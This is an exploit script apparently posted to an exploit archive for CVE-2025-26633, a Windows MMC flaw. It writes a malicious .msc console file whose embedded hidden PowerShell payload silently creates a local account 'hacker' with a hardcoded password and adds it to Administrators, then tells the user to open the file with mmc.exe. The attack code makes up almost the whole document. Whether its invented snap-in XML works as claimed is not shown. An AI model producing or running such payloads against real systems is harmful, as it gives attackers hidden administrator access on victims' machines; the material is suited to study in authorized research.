📄 Microsoft MMC MSC EvilTwin Local Admin Creation

#!/usr/bin/env python3
    # Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation 
    # Date: 2025-11-22
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.microsoft.com
    # Software Link: N/A (built-in Windows component - mmc.exe)
    # Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025
    # Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched)
    # CVE: CVE-2025-26633
    # CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    # Category: Local
    # Platform: Windows
    # CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
    # Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
    # Impact: Arbitrary code execution with the privileges of the user opening the .msc file
    # Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
    # Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
    # Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
    # Target: Unpatched Windows systems (pre March 2025 patches)
    
    # CVE-2025-26633 Proof of Concept – Add Local Administrator Account
    # Use ONLY in authorized penetration testing or isolated research labs
    
    import os
    import xml.etree.ElementTree as ET
    
    # PAYLOAD: Adds local administrator account "hacker" silently
    PAYLOAD = (
        'powershell.exe -NoP -W Hidden -C "'
        '$user = \\\'hacker\\\'; '
        '$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; '
        'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' '
        '-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; '
        'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user '
        '-ErrorAction SilentlyContinue; '
        'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"'
    )
    
    def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
        root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
        
        string_table = ET.SubElement(root, "StringTable")
        ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
        ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"
        
        snapins = ET.SubElement(root, "SnapIns")
        snapin = ET.SubElement(snapins, "SnapIn")
        
        ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
        ET.SubElement(snapin, "Description").text = "Custom Administration Tool"
        
        actions = ET.SubElement(snapin, "Actions")
        action = ET.SubElement(actions, "Action")
        ET.SubElement(action, "RunCommand").text = PAYLOAD
        ET.SubElement(action, "Name").text = "AddLocalAdmin"
        
        tree = ET.ElementTree(root)
        tree.write(filename, encoding="utf-16", xml_declaration=True)
        print(f"[+] Malicious .msc file successfully created: {filename}")
    
    def main():
        msc_file = "CVE-2025-26633-AddAdmin.msc"
        create_evil_msc(msc_file)
        
        print("\n[+] Next step (execute inside vulnerable target or lab VM):")
        print(f"    mmc.exe \"{os.path.abspath(msc_file)}\"\n")
        print("[!] Instant local admin account will be created:")
        print("    Username : hacker")
        print("    Password : P@ssw0rd123!")
        print("    Verify with: net localgroup administrators")
    
    if __name__ == "__main__":
        main()